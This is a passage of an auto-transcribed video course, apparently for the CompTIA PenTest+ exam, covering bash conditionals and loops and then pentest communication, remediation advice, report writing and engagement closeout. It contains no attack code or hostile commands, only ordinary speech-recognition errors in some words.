that that doesn't matter to our code right now same thing here zero two six fifty nine now observe that there is a catch here actually there is a an error and that error is since I'm creating independent conditions independent conditions the same different messages will be displayed for the same hour so let's say that it's five am well is it lower is our in this case five lower than six yes it is so it's gonna show you should be in bed then it's gonna test S5 lower than 12 it is as well so it's gonna

show good morning oops is it lower than 18 yes it is it's gonna show good afternoon and it's lower than 23 so it's gonna show good evening now regarding this syntax whenever we want to perform to create a condition at least in bash we do if and this is the same for any language just the the formatting here that may differ from one language to another but in bash you do if you use brackets and then you create your condition in this case I want to retrieve the value of the variable hour which is the

current hour very important very important in bash when you want to create conditions involving numbers you have special characters to make that comparison for example in this case I'm using Dash LT which stands for lower than if I wanted to say to compare for example if I wanted to say if it's lower than or equal Dan I would have to say l e lower denar equal well actually it is correct so lower than or equal instead of six it will cover from zero to five because it doesn't include six same thing here lower than not

lower than or equal so it doesn't include 12. it includes up to 11 here up to 17. oh and there we go here I use lower than our equal l e 23 so this one includes 23. okay then I use the semicolon the keyword then and then what you want to do whenever that condition returns a true statement if that is a true statement I want to display this message is my condition done or at least the comments that should be executed in case the condition is true if it's done I think I end that

if with a Phi I do another condition now observe that these two conditions this one and this one are independent and that is the problem here I'm not using nested conditions which I should do because if I say okay if our 5 is lower than 12. it's including 0 1 2 3 4. and five which should be covered by this condition only so I should either do if our greater than or equal six and lower than 12 that would be okay or there is another solution in which we use nestatives and that is the next

script we're gonna look at so same thing here same thing here all the same okay let's take a look at the execution of this script right here there so once again since it's six a.m it's not going to include this condition here because it's 6 is not lower than six it's lower than or equal but you will include this one this one and this one how can we fix that that's why we have the comparison to that at sh right here and let's take a look at some nested conditions now the semantics is the same

in any language it's just this specific syntax that may differ from one language to another in bash the way that you created these nested conditions is okay so same thing here if our lower than 6 then Echo you should be in bed then instead of doing an independent if and you can see that I did not finalize this if here this keyword is inside that condition the first if I could either do else I could do another if one if inside another if but in this case I'm using else if which means else which which

stands for if it is not lower than six but there is still another condition so that's why I have if else if else if our is not is lower than 12 so observe it will only reach here if our is not lower than 6 so it must be greater than or equal six six or above but at the same time it must be lower than 12 so it will range from 6 to 11. then I display good morning I do the same thing for lower than 18. it will only reach here if it's not lower

than 12. which means from 12 up to 18. no actually not 18 but 17 because it's lower than 18. now observe that for the final one I only do else why because it will only get here if it's not lower than 18 which is from 18 up to well the highest hour that we have is 23. so I don't have to check whether it's lower than or equal to 23 or not it must be Echo good evening and then I only do one Phi I only finalized that if over there let's take a look at

it oops ah nice now using the same code we can do something more let's say interactive in regards to the user that is running that script in this script the the script will interact with the user it will ask for an answer so I'm using Echo here to display this message actually it's a question continuous the execution of this script then we have the bash command read read caught when you invoke the read command the bash script will wait for the interaction of the user it will wait for the user to inform something to type

something for the user's input when that user enters something that content will be stored in the count variable and then I continue I use the same code but observe that now what I'm doing is I'm comparing the content of the count variable with a string observe that I'm not using those special comparison characters as we do when we have a a number comparison I'm not using Dash l e Dash LT Dash EQ if I was to compare two numbers whether those two numbers are equal to each other I would use Dash EQ since I'm not

comparing numbers I'm comparing a string then I use two equals this is two equals right here if count equals yes then it will execute that code go we go down here if it's not equal to yes it will exit my code so when the user enters something if this is different from yes it will check is what the user entered equal to yes no it wasn't okay so exit it's not going to execute all this if it is equal to yes then okay execute it let's take a look at it oh that's three continue with

the execution of the script yes what is the current hour it's let's say that it's 15. good afternoon so observe here that now I'm not using this system's current hour the user is informing that so let's go back to the code if the user answered yes I'm gonna ask another question which is what is the current hour the user is going to inform that hour and the entire code will depend on what the user informed so let's run it again continue with the execution of this script yes what is the current hour let's say it's

20. good evening continuous the execution of the script yes let's say it's 10 am good morning now what if I say no there it's not going to execute that content so in this script you can see some more interaction between the script and the end user now let's take let's move forward and take a look at Loops then we have two basic Loops we have more but the the basic Loops are the the ones that are actually used and you're gonna see around there in Bash are for and while let's take a look at the

for Loop first very similar to any other language right you create a four and between the parentheses you're gonna have the initialization how you initialize a variable and this is the variable that should be used as a reference for the execution of that Loop so I'm initializing x with 1. I then the condition for how long you want to execute this for Loop until X is lower than or equal 10. observe that the way that I do this comparison is lower than or equal then semicolon and if you do what do you want to execute

at each iteration of that code okay so in each iteration I want to increment X by 1. so four parenthesis parenthesis those values close both parentheses semicolon do when the bash script finds do here when the bash interpreter finds do it knows that whatever comes below should be executed in case this condition here is true until it finds done so what am I doing here initializing x with 1 I want to execute it until while actually X is lower than or equal to 10 and at each iteration I want to increment it by one so

it will inter iterate for 10 times at each time x will be incremented so the first time it will be 1 the second iteration two then three then four and at each iteration its content will be displayed so let's take a look at it there you go now not all languages have this capability although most of them do bash does as well which is the capability of creating a four a loop with four that is not covered that is not created by using the parenthesis it is more flexible you can create its own conditional its

own condition using an array for example so in this case I am using a shell command which is the SEC command it creates a sequence this sequence will start with one go until 10. since it's a shell command A bash command I used I have to use the back quotes so 4 x in and then I create the range of possibilities the range of possibilities is 1 to 10. it's gonna do the same thing same result same output as the previous code but you can see that I can create my range over here in a

more flexible way why do I say that it's more flexible because you can use any command or any syntax that you want it's not fixed like start a variable with this value increment that variable and you do it until that variable reaches that is that other specific value now I create my the range of possibilities right here now lastly let's take a look at the while loop and this is a code that will do the same thing in while you don't have the possibility as you're doing four of between the parentheses defining how the variable

will be initiated and in case you want to change something during each iteration you cannot do that so first of all I have to initiate my variable outside of that Loop and I have twin creating increment edit each iteration other than that I have the same thing as my first four code as we can compare here so this came over here this came over here but we're gonna have the same result there now let's take a look at this wire here we're gonna go back to that code that script that will say good good morning

good afternoon and good evening you should be in bed according to the hour however the difference is I put everything inside a while and here you have something a little bit different instead of using two parentheses I'm using just one bracket that is perfectly fine as long as you remember to put to leave these spaces here okay so that same code the same code over here I think it's comparison to that s uh is it free yeah so the same one that would would ask continue with the execution of this script but the the question

was regarding executing the script only once do you want to execute it once if you don't you won't execute it not even once in this one I have a loop that will execute the content Forever Until you say no I don't want to continue with the execution so let's take a look at it first of all I'm creating a condition which is execute the entire code the entire code until can't is not equal to yes if count is equal to yes you just keep executing the script and that each iteration it will ask that question

again continue with the execution of this script let's say that I say yes okay it will go back up here because the loop is is done so it go back south there to perform another test is Count equal to yes yes it is so it will do all this again ask again continue with the execution yes everything again until I say no is quantity equal to yes no it's not then it leaves that Loop however to start to enter the loop I have to have count with the content yes so that's why I'm doing this

outside of the loop let's take a look at the execution of this script right here what is the current hour let's say it's three you should be in bed do you want to continue with the execution of this script yes what is the current hour let's say it's 20. good evening continuous the execution of this script yes what is the current hour 13. good afternoon continuous the execution of this script no and it leaves the script so you have to keep in mind that for the CompTIA fantastic exam you have to know how to write

and interpret Scripts because this is an automation task you create scripts to automate your tasks obviously the scripts that you're gonna see in the CompTIA pentas plus exam are more associated with networking and Pen testing tasks so you're going to see for example a script that is at invoking the execution of a and map the script that is invoking the execution of the netcat NC command but that really doesn't matter what matters is whether you're capable in regards to scripting whether you are capable of analyzing the code according to the language because the tool you

already know how to use the tool if you see a script that is invoke invoking nmap you know nmap if you see a script that is invoking enca and netcat you know how to use netcat that is not a problem so keep in mind at least these four languages Powershell bash python Ruby those are mandatory for the county of pentas fantas plus exam I hope you enjoyed this video thank you very much hello welcome to module 12 and in the CompTIA pentas plus exam or at least its syllabus the last Topic at which is at

least listed as the last topic we have communication and writing reports so as you already know by now the CompTIA pen Test Plus exam is not only focused on the technical aspects of pen testing but you have to also know how to write reports how to communicate with your client how to write documents such as the statement of work how to define the Rules of Engagement all those Concepts that you should be aware by now therefore communication and Reporting is also another topic that should be covered for the to get ready for the CompTIA pentas

plus exam and that is why we're going to start talking about communication so first of all you have to be aware that communication is a resource that you should use in All Phases doing all phases what does that mean that means that although ideally you should once you start the depend test phase you are only going to deliver documents once you complete that phase now this is just an idea and that's how in general that's what you should do that's how you should proceed obviously this can change according to the Rules of Engagement and the

statement of work that you establish with your client so you may have a client that would say okay so I want a milestone reports so I want partial reports but that that would be an exception as a rule what you should do is write just a final report however in order to finalize all the pen testing tasks that you have to to execute you should communicate with that client during all phases for a very specific and clear reasons feedback and expectations so you want to know what your client thinks of what you've been doing so

you need some feedback at the same time you want to know if you're covering the expectations in order to know whether you are in the right path or not now real-time adjustments may be required so as you communicate with your client so you're getting some feedback and you're analyzing um you're trying to understand whether you're covering the expectations or not so if you're not getting let's say a positive feedback or you are getting some positive feedback but then you see that is not quite what the client is expecting there is something something more or maybe

your scope is way too broad and you you have to shorten your your scope so real-time adjustments may be required maybe you want to proceed in a certain way you have a path that you want to follow but as you communicate with your client you see no this is not going to work I have to change I have to Pivot now keep in mind and always remember everything should be established should be defined everything that is technically speaking everything that should be performed should also be established in the Rules of Engagement so you may remember

that most of the times The Rules of Engagement will be defined in this statement of work so the statement of of work will describe how you're going to execute the the phases the pen testing phases that you need it should also include how you're going to communicate with that client for some very specific reasons well first of all before we see the reasons we have to know what we should establish in the Rules of Engagement in regards to communication so for example to whom should you communicate who should you communicate with whenever I see something

that requires some level of communication or if it's just the just a regular communication that has to be also defined for example okay if this project is going to last six months how often are we going to communicate are we going to establish a weekly meeting so how frequent is a requirement now associated with that frequency you also have who who are you communicating with is this just one specific person is it a group of person and how that communication is going to work now the reason why you have to establish the frequency the how

and especially the who is to avoid third-party interference so you don't want to have let's say you don't have to have a IT staff member coming to you and saying hey um I saw that you were pen testing our Linux server and I am the Linux engineer so could you could you share with me what you're doing what what you found so enlighten me give me some uh info in advance even so that you can have the the argument so that you can say hey I'm sorry but I cannot do that I cannot give you

that information because according to what's been established in the Rules of Engagement in the statement of work there is just one person that I can communicate with I'm so sorry but that's our contract so you use this even as a tool in order to avoid people from coming to you looking for you asking questions that should not be asked and even less should be answered now even though communication should have a definition a frequency definition there what is called some triggers some communication triggers that may happen and that will generate unplanned communication a unplanned communication

is a communication that arises as a requirement as you run your tasks as you pen test so once again let's say that you're deploying a project that will last six months and you agreed with your client that you're gonna have weekly meetings let's say 30 minutes 60 Minutes weekly meeting meetings now there are some triggers that may require you that will demand unplanned communication you're going to have to have extra an extra meeting because of that of that event so let's take a look at some of the communication triggers so according to the CompTIA pen

Test Plus exam these are the communication triggers that you should be aware of first of all completing of a testing stage which we could Define as a milestone so in the Rules of Engagement you're gonna establish the frequency of the communication however there is also a chance that you define there with our client okay so we're gonna have Milestones whenever a complete this specific task this Firestone we're gonna have another meeting so let's say that our weekly meetings happen on a Friday okay what if I complete a task on a Sunday for example are we

going to wait until the next Friday to see it and talk about that that milestone so if that's okay that's okay however there are situations in which the client doesn't want to wait that long once a milestone is finished you should have a a meeting an extra meeting but again that should also be determined by the Rules of Engagement critical finding now remember all triggers are supposed to be covered by the rules of engagement and they should be seen in this statement of work okay so another one is critical finding let's say that your pen

testing one of the the routers that company that client has and you'll find a critical flaw a critical vulnerability are you going to wait another week maybe five days six days until you tell your client that there is a very very critical flaw that could compromise that client in a short period of time in the near future no you should not do that so if a critical find if a critical vulnerability is found you should communicate with your client you should let him or her know at spot another one is prior compromise let's say that

you're you're analyzing some stuff maybe you even got access you were able to successfully access a server or a system and then you see that you are not the only one that was able to find to compromise that server you see that there is a back door installed there as well aside from yours in case you're installing another backdoor well there is another trigger you should let your client know so you should have another an extra meeting to let him or her know there are some situations that will even excuse meetings you can simply just

for example text you can send an email you have so for example critical findings prior compromise these are some types of triggers that they may not even be possible to wait until you get that meeting maybe the client is very busy and he or she cannot meet with you in that same day maybe not even in the next day so but at the same time that person must be aware of these problems and what do you have to keep in mind as previously mentioned is that usually triggers demand pivering so imagine that you're a pen

testing a client and you just got access to a server and then you find a something that is very critical very very critical in a way that you should now start focusing on that well you planned something and now you have to Pivot your your path you have to change your approach okay that's very natural that's very common when you're performing pen tests however what you must know what you have to keep in mind in regards to communication is that the stakeholders must be aware of that pivoting they must be aware that you're changing some

things due to something that happened that came up and you were not expecting so always always communicate with your client that is critical and the con a concierge plus exam will require that from you now whenever vulnerabilities or anything let's say an anomaly is found that must be reported that must be communicated reported but also you as a pen tester should also write recommendations do recommendations now there is a big if here there is a big debate in regards to whether the pen tester should recommend something or not but there is a very simple explanation

to the question why the pen tester should also recommend not only detect and tell the client but also recommend mitigations tell the client how that could be fixed for example which is the pen tester knows more for a very simple fact he or she was able to find that vulnerability now these recommendations can be done before the report or in the report but they must be done in some situations for example when there is a trigger such as previous compromise or critical finding well you don't want to wait until the final report to write a

recommendation you want to do the recommendation at spot as you find them now a mitigation might involve not only technology resources but also processes and human resources what does that mean we tend to think that to fix something when it comes to I.T we have to use a tool well there are several different situations that well probably a tool will help you or it will help the client but not only that processes in Human Resources most likely will be involved as well in order to mitigate that problem for example let's say that you find out

that there is no uh password changing policies so users they can Define any password they want they can even use a blank password okay so you can use a tool in order to prevent that from happening however there is something that is has been done by the the staff by the employees if that's the case just deploying a tool will not be necessary or will not be enough so that tool may say may help the client to Define no empty passwords anymore the tool can help the client that your client to Define okay so passwords

will now have to have it will have to be eight digits long at least eight digits long it must have a lowercase and uppercase characters symbols and numbers just an example okay that's good the problem is if that employee that defined a password as nothing it just had a blank password empty password there is a very high probability that same employee will write that past that new password down in a posted paper and leave it under the keyboard for example or paste it in the monitor so there are situations that will involve the employees as

well there are even situations that will require changing processes updating processes so the process a process involves how the company works or how a specific department works or how a few employees of a specific department works so for example um every day when the employee arrives at the company he or she must log in but if he's going to take a break a five minute break to have some have some coffee that user must log out and then log in again well our users don't do that okay so there must be a change in the

process not only in Human Resources but in the process how is that schedule fitting in the employees schedule maybe there should be a different approach that would convince that those employees to log out and then logging in again so the way that something occurs can be updated can be changed in order to improve something now when vulnerabilities or some flaws are found we have to deploy some remediation the the client must deploy some remediation you as a pen tester must be aware that there are some remediation strategies because there are some problems that are found

in networks in systems that are very common so the CompTIA pentas plus exam demands remediation strategies for a few different actually six different problems so different approaches remediation strategies to different problems the first problem is shared Administration credentials it's very very common to see for example a company that has many servers and since it's a large company they don't have just one uh uh one sees admin for example or one network analyst for example they have more than one and all of those must be able to run administrative tasks use administrative tools perform administrative events

since this system by default will only have one single administrative user let's say if it's a Unix system the root user if it's a Windows system the admin user so usually what companies do they share those credentials so all the network analysts know that same user and password they they know that same credentials the problem with that is if there if something happens the company will not be able to tell who actually caused that problem now how can you remediate how can you mitigate that problem let's say for example that it's a Linux environment you

can deploy the pseudo system the pseudo tool so each analyst will have their own limited user but then you can say okay so these users here can run these tools as root so they can perform administrative tasks but each of those will use their own credentials their own user account if something happens you'll be able to tell who it was plain text and or weak passwords well first of all plain text passwords should never be used that is we saw in the past that and when I say plain text I'm not saying for example let's

say that the password is one two three four five six if someone captures traffic sniffs the network that person will see one two three four five six okay that's not even the case when we have a plane plain text transmission it's probably going to be hashed but we saw in the previous modules that cracking hashes can be very simple so this should not be used whenever possible you should use TLS or SSL apis libraries so the password the credentials the authentication phase should be encrypted along with the transmission the data transmission as well also prevent

from using from allowing weak passwords users employees usually tend to use weak passwords because they want to remember there is a very high probability of forgetting a password so you should use some techniques to force the users to Define good passwords so that's why you should Define the company should Define not you but the company should Define password changing policies a tool that can help the client the company to do that if it's a Linux environment and I'm always focusing on Linux because these [Music] topics here usually are usually associated with servers because all this

is controlled by servers and most of the servers are Linux servers okay now in a Linux environment Pam a subsystem called Pam can help the client to deploy that there are several different solutions Windows has that as well a not PM but other alternatives but what is important is uh taking Pam as an example using this subsystem the client will be able to Define for example how long the password should be how frequent the employees should change their passwords um if that password can match a previous password how many previous passwords can should defer so

all this can be defined and again there are different types of tools that will allow you allow the client to do that now always remember that you as a pen tester what you're going to do in order to figure out whether the the company uses weak passwords is by capturing hashes if possible and then try trying to crack those passwords another problem single Factor authentication nowadays many many systems many tools many softwares support multi-factor authentication which means not only one authentication system but more than one authentication system should be used for example credentials login and

password username and password and access code so the user should have a phone number registered in a way and that user is about to log into the system he or she will have to inform the the username and password then that user is going to receive a text and SMS with an access code that's one there are some mobile applications that would do that for you will help uh not you but will help the client to deploy that another one biometric that's another one a RFID Card so any type of different authentication system not just

the traditional username and password also remediation strategies for SQL injections so always make sure that the EU identify SQL injections but even if the the pen tester doesn't identify SQL injections the client should be aware that these types of injections are very common so the client should always be focusing on trying to find possible SQL injection vulnerabilities a good tool that would help the client is SQL map for example and also tell the client that he or she should always be performing hardening hardening means the company should focus on the at least the the staff

that is responsible for the security of the company systems and infrastructure they should always be focusing on hardening making the systems and devices safer looking for ways of improving the configuration so not only finding vulnerabilities finding flaws but improving misconfiguration for example and one misconfiguration that is very common to see is unnecessary Services unnecessary open Services services that are running but they should not be running let me give you an example if you install a new Windows server and for some reason maybe because it's the default or maybe because you just made uh you as

the uh Network admin enable that service by mistake during the process of installation you install that system and the IIs the web server the Microsoft web server is enabled after installation but does does that Windows Server really needs that service does the network does the client really need that service well if not then it should be disabled and this is a remediation strategy that is demanded is required by the CompTIA pentas plus exam now when writing a report there is no strict formula there is no fixed template of how to write a report such as

these are the sections that a report should have however there is a common sense standard that defines that report should have a executive summary or simply a summary and this is actually the most important part of a report of a pen tester pen testing report because most likely this summary is not only going to be read by the I.T the technical personnel but also by the director for example so you should use some words here you should use some wording that will make it easy for him or her or for those people to understand what's

going on and in this summary you're going to cover the entire report so a but also very brief try to be very objective so basically in this section what you're gonna write is something like okay so this is a report that should present what's been done and what we found what what's been done this this and that very quickly just one paragraph maybe two and we found some critical events some critical vulnerabilities such as and just a brief listing of the main ones and that's it now also you should describe okay and this report will

also tell you how to fix these problems and that's it then you move to the next section which is findings and Remediation here you're gonna detail your findings and also describe how to remediate how to fix those problems if possible or at least mitigate the problem this is gonna be um a a section in which you're going to use more technical words and also probably a bunch of links in order to explain better explain for example the vulnerabilities that were found and links to the remediation steps that could be taken now in the methodology section

you should detail how you achieved those results how you found those findings here probably you're going to use you're gonna name the tools that you found but also the approach and finally the conclusion okay so what's your conclusion once a report is delivered you have to keep in mind that this report has some critical information most likely it has some critical information such as for example vulnerabilities that were found probably it's going to list links that even describe how to exploit those vulnerabilities it's going to have IP addresses in there maybe even username and passwords

so it is a very very critical document that is why handling this report is critical as well which is why dispose of the digital and hard copies must be defined how are you as a pen tester going to dispose both the digital and the hard copies of that of that report but this report must must get to the hands of the the person or the people that should receive it so you have to guarantee that there is a secure transmission and also a Secure Storage both on your end as the pen tester and on the

client's end and the client should also determine for how long that report should be stored so you're communicating you communicated throughout the entire engagement throughout the entire process you finalized your report and now you have to finalize the engagement which basically is closing that chapter so to finalize an engagement you have to perform what is called as post engagement cleanup what is a post engagement cleanup this is a phase in which you as a pen tester will have to erase everything that you used installed created in that client's infrastructure so let's say that you created

scripts and installed in scripts you installed tools you created files whatever you did you have to go go back there and wipe that out there should have there should be nothing left according to what you've done everything that you should that you you've done and you've found should be presented in that report they should not physically exist in those systems or servers devices so basically you have to make sure that the systems are all back to pre-engagement once that's all done you need the client acceptance so a document in which you're gonna get your client's

signature saying hey this pen tester here did everything that he or she was supposed to do according to the Rules of Engagement and statement of work and then you finalize that engagement so in this video we talked about communication writing reports and closing and engagement or closing a contract keep in mind that Community continuous communicating continuous communication is critical but the report should only ideally it should only be delivered as a final stage just like when you deliver when you hire a service you pay that person when that person finishes that service usually so this

is the same thing you only deliver that product once it's done but then you have to do everything that is supposed to be done to close that chapter finalize that engagement close the contract I hope you enjoyed this video thank you very much